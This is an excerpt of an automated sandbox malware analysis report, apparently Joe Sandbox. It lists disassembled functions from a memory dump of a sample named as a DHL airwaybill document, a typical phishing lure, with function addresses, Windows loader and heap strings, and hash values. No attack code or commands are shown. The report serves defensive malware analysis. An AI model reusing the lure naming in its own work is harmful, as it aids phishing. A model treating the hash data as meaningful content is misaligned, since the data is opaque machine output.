                • Instruction ID: 9ecbaf24cd41985d00be02a3b6dca320e6f4cecdd2eaa5b968e8e4b90338776e
                • Opcode Fuzzy Hash: 80bb613e6aa019236f0c04c4d4bf9c62a85e87f3765c6e712e1a1ad9e8153a84
                • Instruction Fuzzy Hash: 58A1BF35900229DBDB29CF68D888BA9B7B1FF98314F1542E9D918AB251D730DE91CF90
                Function 01B34AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                Download Yara Rule
                Strings
                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B73456
                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B7342A
                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B73437
                • RtlDeactivateActivationContext, xrefs: 01B73425, 01B73432, 01B73451
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                • API String ID: 0-1245972979
                • Opcode ID: c70abdf92837024d66271c9bd83545f264cc3697d9ead0bd53943342f74eddb0
                • Instruction ID: d20cd34011ab318549bd24910a1658d458d61a8a25278a97534748ba94bedf64
                • Opcode Fuzzy Hash: c70abdf92837024d66271c9bd83545f264cc3697d9ead0bd53943342f74eddb0
                • Instruction Fuzzy Hash: 47613536640712AFDB2ECF1DC881B2AB7E1FF80B20F54859DE9659B251DB34E811CB91
                Function 01B064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                Download Yara Rule
                Strings
                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B6106B
                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B61028
                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B60FE5
                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B610AE
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                • API String ID: 0-1468400865
                • Opcode ID: be24640f48b5cdc309326c51ed86e34af04069eb9c3d3f79f7bb70d93ac67ee8
                • Instruction ID: 156c4479a79e055d8299d8ea4d2cb40396ae47c5911ba905cba247707fe4c9d7
                • Opcode Fuzzy Hash: be24640f48b5cdc309326c51ed86e34af04069eb9c3d3f79f7bb70d93ac67ee8
                • Instruction Fuzzy Hash: 7371D171904349AFCB26EF19C884B977FA8EF58764F4005A8F9488B286D735D588CBD2
                Function 01B2245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                Download Yara Rule
                Strings
                • LdrpDynamicShimModule, xrefs: 01B6A998
                • minkernel\ntdll\ldrinit.c, xrefs: 01B6A9A2
                • apphelp.dll, xrefs: 01B22462
                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B6A992
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-176724104
                • Opcode ID: 61d425739ca83d29659e5ca63591aa95c16af6a95fc9f892a418e7b1f515dd72
                • Instruction ID: c850334f9728f6fdacf0b41c78d334ca1d839b5f56b97ba41469228c976368dc
                • Opcode Fuzzy Hash: 61d425739ca83d29659e5ca63591aa95c16af6a95fc9f892a418e7b1f515dd72
                • Instruction Fuzzy Hash: A1315975600201ABDF399F6DD885E6A7BF9FB94B00F2500DEF911B7295C774A941CB80
                Function 01B129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                Download Yara Rule
                Strings
                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01B1327D
                • HEAP: , xrefs: 01B13264
                • HEAP[%wZ]: , xrefs: 01B13255
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                • API String ID: 0-617086771
                • Opcode ID: 82184d0dc5c5615a1489d483bcdae29b990ac958e255861805159e727d8c23c8
                • Instruction ID: 4693a186751d4089f7c38e9206ceb60a94a5a029ae09237a790139315382a5eb
                • Opcode Fuzzy Hash: 82184d0dc5c5615a1489d483bcdae29b990ac958e255861805159e727d8c23c8
                • Instruction Fuzzy Hash: EC92CC71A042499FDB29CF68C4407AEBBF1FF08310F6985D9E849AB369E335A945CF50
                Function 01B10770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-4253913091
                • Opcode ID: 7ef209b2c57a310abf69b778dabbc86111ac179484c9bb51a8350e88e7f3ea66
                • Instruction ID: e19d894f36c7c25f8462610d1449210d5e48648e12c07874d8b251bf694872c1
                • Opcode Fuzzy Hash: 7ef209b2c57a310abf69b778dabbc86111ac179484c9bb51a8350e88e7f3ea66
                • Instruction Fuzzy Hash: 21F1BB30A00606DFEB29DF68C890B6AB7F6FF54344F1582A8F5169B385D734E981CB90
                Function 01B26962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: $@
                • API String ID: 0-1077428164
                • Opcode ID: 5d36c292aaeec90417f4ecb719ac7be0e8afc9542d87cc5c46b863b98ecd5442
                • Instruction ID: 294bef29686dfd65941fd8eac9939d7348f255a9f8977c46077444d31c44a4ac
                • Opcode Fuzzy Hash: 5d36c292aaeec90417f4ecb719ac7be0e8afc9542d87cc5c46b863b98ecd5442
                • Instruction Fuzzy Hash: 28C280716083519FDB29CF29C840BABBBE5EF98714F0489ADF9C987251DB34D808CB56
                Function 01AFA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: 9ab0a5b4f1b4ba3f69ed9e9d8d6a765315823a5f74f4f937141c1a1c590edee7
                • Instruction ID: d140f4a2e4c4ac3b8003f1cf6df3b214dfabf37ce046fdf88709a0dfaeb3f06f
                • Opcode Fuzzy Hash: 9ab0a5b4f1b4ba3f69ed9e9d8d6a765315823a5f74f4f937141c1a1c590edee7
                • Instruction Fuzzy Hash: 14A18B359016299BDF75DF68CC88BEABBB9EF44700F0041E9EA09A7210D7359E84CF50
                Function 01B20BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                Download Yara Rule
                Strings
                • LdrpCheckModule, xrefs: 01B6A117
                • minkernel\ntdll\ldrinit.c, xrefs: 01B6A121
                • Failed to allocated memory for shimmed module list, xrefs: 01B6A10F
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                • API String ID: 0-161242083
                • Opcode ID: 300275f8b89cb179b2f51d20e4b4f55f54f2c7a59fb7f5eeb8ab367b4cb26dc5
                • Instruction ID: 65195ccecdaef191409db519273ffe11e0f91bd20292f2884a05f11123a7cce5
                • Opcode Fuzzy Hash: 300275f8b89cb179b2f51d20e4b4f55f54f2c7a59fb7f5eeb8ab367b4cb26dc5
                • Instruction Fuzzy Hash: 4C71CEB5A00205DFDF2DEF68C984AAEB7F8FB48704F1440ADE906EB255E734A945CB50
                Function 01B3C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                Download Yara Rule
                Strings
                • Failed to reallocate the system dirs string !, xrefs: 01B782D7
                • minkernel\ntdll\ldrinit.c, xrefs: 01B782E8
                • LdrpInitializePerUserWindowsDirectory, xrefs: 01B782DE
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1783798831
                • Opcode ID: 507bb28ae941a68acf53343f8e9f850f7afbd5c13f0643c50273440f479b8b1e
                • Instruction ID: d479f47dbfb2f2759c22c618341d4f14b82e83a1232b42911790feddfbb98a46
                • Opcode Fuzzy Hash: 507bb28ae941a68acf53343f8e9f850f7afbd5c13f0643c50273440f479b8b1e
                • Instruction Fuzzy Hash: F041D071544301EBDB2AEBA8D844B5B7BE8EF84750F1049AEFD58E3254EB70E810CB91
                Function 01BBC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                Download Yara Rule
                Strings
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01BBC1C5
                • PreferredUILanguages, xrefs: 01BBC212
                • @, xrefs: 01BBC1F1
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                • API String ID: 0-2968386058
                • Opcode ID: ca7da432e5b5d125a973203c0dc91f045d1bcc01408df696966bb525b254dbb9
                • Instruction ID: d7d21c3da36da868452d92b74b36e36b02cc1c92cd95e7f6f12b77e3f989a5d2
                • Opcode Fuzzy Hash: ca7da432e5b5d125a973203c0dc91f045d1bcc01408df696966bb525b254dbb9
                • Instruction Fuzzy Hash: 90415371E00219EBEF19DFD8C891FEEBBB8EB14700F1441AAE609F7640D7B49A459B50
                Function 01B94144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                • API String ID: 0-1373925480
                • Opcode ID: 737a469307e137be5f7659c67f9fcdad4c54986bceda15eb1ed521dbcc1a988b
                • Instruction ID: 7401946f34ebc6b313aadb48d4bc879b9d58828eb9c7539395d16e09afe715df
                • Opcode Fuzzy Hash: 737a469307e137be5f7659c67f9fcdad4c54986bceda15eb1ed521dbcc1a988b
                • Instruction Fuzzy Hash: B741F471A102588BEF2ADBD9CA44BADBBF5FF55340F1505E9D901AB391E7348903CB10
                Function 01B84755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                Strings
                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B84888
                • minkernel\ntdll\ldrredirect.c, xrefs: 01B84899
                • LdrpCheckRedirection, xrefs: 01B8488F
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-3154609507
                • Opcode ID: 85efad4dc6acf398fa8d3c745c61c078de1f988ec72fc10189bfac54605f623d
                • Instruction ID: e6871ba619ed68d6e87b79a57d0cce7382cc13792eb82b5a972813520d9575b7
                • Opcode Fuzzy Hash: 85efad4dc6acf398fa8d3c745c61c078de1f988ec72fc10189bfac54605f623d
                • Instruction Fuzzy Hash: 9641CF36A146529BCB29FE6DD840B267BE4FF49E50F0606EDED49A7215E730E800CB91
                Function 01B10BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-2558761708
                • Opcode ID: e33848ef8ea73acdf59bcbd52d9b2227f4327b7655f171d3e2ff0e062b15216a
                • Instruction ID: a8a08ef1b559f84c0a69dc11f85afe1ec1b05fb77b553ebee87140b9dc3a5ddb
                • Opcode Fuzzy Hash: e33848ef8ea73acdf59bcbd52d9b2227f4327b7655f171d3e2ff0e062b15216a
                • Instruction Fuzzy Hash: B111E1313151029FDB2DEB18C480B76B3A8FF50A59F1982EDF406CB259DB38D890C750
                Function 01B820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                Download Yara Rule
                Strings
                • LdrpInitializationFailure, xrefs: 01B820FA
                • minkernel\ntdll\ldrinit.c, xrefs: 01B82104
                • Process initialization failed with status 0x%08lx, xrefs: 01B820F3
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2986994758
                • Opcode ID: d69bf3c0e111fd7fcf03eeba713cda0cb2637aa866ae9ae10bf562e8e31139d3
                • Instruction ID: bf0720abfdc44bb951bbedd8bbce9f3d9700487ccaf0af62d027e02195b8d045
                • Opcode Fuzzy Hash: d69bf3c0e111fd7fcf03eeba713cda0cb2637aa866ae9ae10bf562e8e31139d3
                • Instruction Fuzzy Hash: 65F0C275640308BBEB28FA4DCC46F993BACFB40F54F2400D9F600A7681D7B0A940C791
                Function 01B103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: #%u
                • API String ID: 48624451-232158463
                • Opcode ID: 78cda72d431c325dbd5335763a0a77c7ecd3ad0a16f04d652d0f5155603e069f
                • Instruction ID: 6c9d7639e1e455d19ad35e864eae7a725282bb773a9b6ce727c574a6037f96f6
                • Opcode Fuzzy Hash: 78cda72d431c325dbd5335763a0a77c7ecd3ad0a16f04d652d0f5155603e069f
                • Instruction Fuzzy Hash: 37714971A0054A9FDB09EFA8C990BAEB7F8FF18704F1540A5E905E7255EB38ED41CB60
                Function 01B0A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                Download Yara Rule
                Strings
                • LdrResSearchResource Enter, xrefs: 01B0AA13
                • LdrResSearchResource Exit, xrefs: 01B0AA25
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                • API String ID: 0-4066393604
                • Opcode ID: bb80bd5516f9dfb9239475f9aab8e457fafb612db98051047bff8f3526e0230a
                • Instruction ID: d32689ccf6565e747ec4b58d0fc777eeceab7dff7bde967e413a8270eac7e48c
                • Opcode Fuzzy Hash: bb80bd5516f9dfb9239475f9aab8e457fafb612db98051047bff8f3526e0230a
                • Instruction Fuzzy Hash: ECE18471E007199BEF2ADEA9C980BAEBFB9FF54310F1049A5E901E72D1D7389941CB50
                Function 01BCA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction ID: 4501b8179fc88275ab13895d6d0ff06608fadb1a81a18a26247ef9220e988a90
                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction Fuzzy Hash: E4C1B03120434A9BEB29CF28C841B6BBBE5FFD4B18F084A6DF69687290E774D505CB51
                Function 01B7E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Legacy$UEFI
                • API String ID: 2994545307-634100481
                • Opcode ID: d349fdda62ad7ab03b856319f38e071e1f4a85c6be1c41412996a1ab4ad6d8d1
                • Instruction ID: 1c44f7f3b202e5142b43b39b2509292dd17eb127c64942b8b7bf4fa747bc6e9d
                • Opcode Fuzzy Hash: d349fdda62ad7ab03b856319f38e071e1f4a85c6be1c41412996a1ab4ad6d8d1
                • Instruction Fuzzy Hash: 9A613C71E006199FDB29DFA8C840BAEBBB9FF48700F1441ADE659EB291D731E940DB50
                Function 01BA43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$MUI
                • API String ID: 0-17815947
                • Opcode ID: e9a45f9822e79ceb4296033dcd5be78a190c4978df1b7202ceb88c1e15ae16cb
                • Instruction ID: 9aa19214a007eefbb6a24aee4a4a307f90542c65d10fb0c0433dee0e7eb5477a
                • Opcode Fuzzy Hash: e9a45f9822e79ceb4296033dcd5be78a190c4978df1b7202ceb88c1e15ae16cb
                • Instruction Fuzzy Hash: 6B514971E0021DAFDF15DFA9CC80AEEBBB8EB04754F5445A9E611B7290DB709D05CB60
                Function 01B004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                Download Yara Rule
                Strings
                • kLsE, xrefs: 01B00540
                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01B0063D
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                • API String ID: 0-2547482624
                • Opcode ID: 48103faacd537e6831f336859d554835c7fa27d19eb7ec324052f70d4fe44040
                • Instruction ID: 91f51efa4236e47b957e8852c88262b50d1b74dc85ba7bc779c729993cbc05b1
                • Opcode Fuzzy Hash: 48103faacd537e6831f336859d554835c7fa27d19eb7ec324052f70d4fe44040
                • Instruction Fuzzy Hash: 7351C0715047429FD72AEF28C8807A7BBE5EF84340F10887EFA9A87281E770D545CB91
                Function 01B0A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                Download Yara Rule
                Strings
                • RtlpResUltimateFallbackInfo Enter, xrefs: 01B0A2FB
                • RtlpResUltimateFallbackInfo Exit, xrefs: 01B0A309
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: fbe62b39853e481c9eb0fc49eeb8ea67991f8d6b5c8aa1461ba0cbc49c4ff61e
                • Instruction ID: 941302713545a05e60c0582c3b543ab04eb77d1f3b982aab63e00acd52c25c50
                • Opcode Fuzzy Hash: fbe62b39853e481c9eb0fc49eeb8ea67991f8d6b5c8aa1461ba0cbc49c4ff61e
                • Instruction Fuzzy Hash: 1E41B030A04745DBEB1ADF69C880B6D7BB4FF95700F1845E9E900DB2A1E7B9D900CB50
                Function 01B3A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Cleanup Group$Threadpool!
                • API String ID: 2994545307-4008356553
                • Opcode ID: 18ede72f0a71bf0368f77e6e8c094fe95d5c6a29fba4f743413b5ae7cad187bd
                • Instruction ID: abb280378c805ccae6c582c4b81e4562e3b63f17982fa7aa109ecc0393eddf66
                • Opcode Fuzzy Hash: 18ede72f0a71bf0368f77e6e8c094fe95d5c6a29fba4f743413b5ae7cad187bd
                • Instruction Fuzzy Hash: E701D1B2640B00AFD311DF24CD45B1677E8F784B15F0189B9B688C7190E334D814DB46
                Function 01B0C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: MUI
                • API String ID: 0-1339004836
                • Opcode ID: 7728ebe607c89a730f5ff28ce882f8b2fc16d9c83b47f9af85a7cc85452fcae6
                • Instruction ID: 186c916cb4c7d88e2cf6bb88682be1528516ade64257b3b638426f8aa2196233
                • Opcode Fuzzy Hash: 7728ebe607c89a730f5ff28ce882f8b2fc16d9c83b47f9af85a7cc85452fcae6
                • Instruction Fuzzy Hash: F7823F75D002199BEB2ACFA9C8807EDBFB1FF48350F1482E9D959AB2D1D7309945CB50
                Function 01B86420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 32e7f68464d5a17a38022d1dd314edf4037e2416698f2ec98d2ef667e7b42e9a
                • Instruction ID: 01052746203c390eaab5e93183d54b2d877f4a6b3400ae5edea17d4e01fd6bba
                • Opcode Fuzzy Hash: 32e7f68464d5a17a38022d1dd314edf4037e2416698f2ec98d2ef667e7b42e9a
                • Instruction Fuzzy Hash: 55915271940219AFEF25EB95CD85FEE7BB8EF18B50F1040A5F604AB191D774AD04CBA0
                Function 01BAE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 50b61ea8337ea3164079a0426aba3c7633a51ce81ba1dd7bbb562f879e424da4
                • Instruction ID: 82aba4fd998be4419201ce259a80611240b878b7a2a421b047d5bcb1d69f300f
                • Opcode Fuzzy Hash: 50b61ea8337ea3164079a0426aba3c7633a51ce81ba1dd7bbb562f879e424da4
                • Instruction Fuzzy Hash: 07919032904609BFDF2AABA5DC84FAFBBB9EF85750F5000A9F505A7250E734D905CB90
                Function 01B3A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: GlobalTags
                • API String ID: 0-1106856819
                • Opcode ID: aa582ac72dfe3bced74b40172c525ad9010be171deacf495bd903d88b5eb9708
                • Instruction ID: 9f9563a0589b3c6bc1c06d6f28dbba8ffbe34367fe24d9983978d49779804d4c
                • Opcode Fuzzy Hash: aa582ac72dfe3bced74b40172c525ad9010be171deacf495bd903d88b5eb9708
                • Instruction Fuzzy Hash: 40717CB5E0060A8FEF2CCF9CC490AADBBB1FF98740F1481AEE815A7241E7319901CB50
                Function 01BA4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: .mui
                • API String ID: 0-1199573805
                • Opcode ID: 1a071c32972dc484a9cf80947321d6bef10fecf3f1d294bcba80e1ca5164d0b0
                • Instruction ID: 4d3a0e6cb94ea2f98696bca78f93533555b6837e3a03daa95a1733bc5f067f7e
                • Opcode Fuzzy Hash: 1a071c32972dc484a9cf80947321d6bef10fecf3f1d294bcba80e1ca5164d0b0
                • Instruction Fuzzy Hash: 7E51C672D052299BDF19DF99D840AAEBBB4FF05B10F4941AAEA11B7250D7B48C01CBE0
                Function 01B1E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
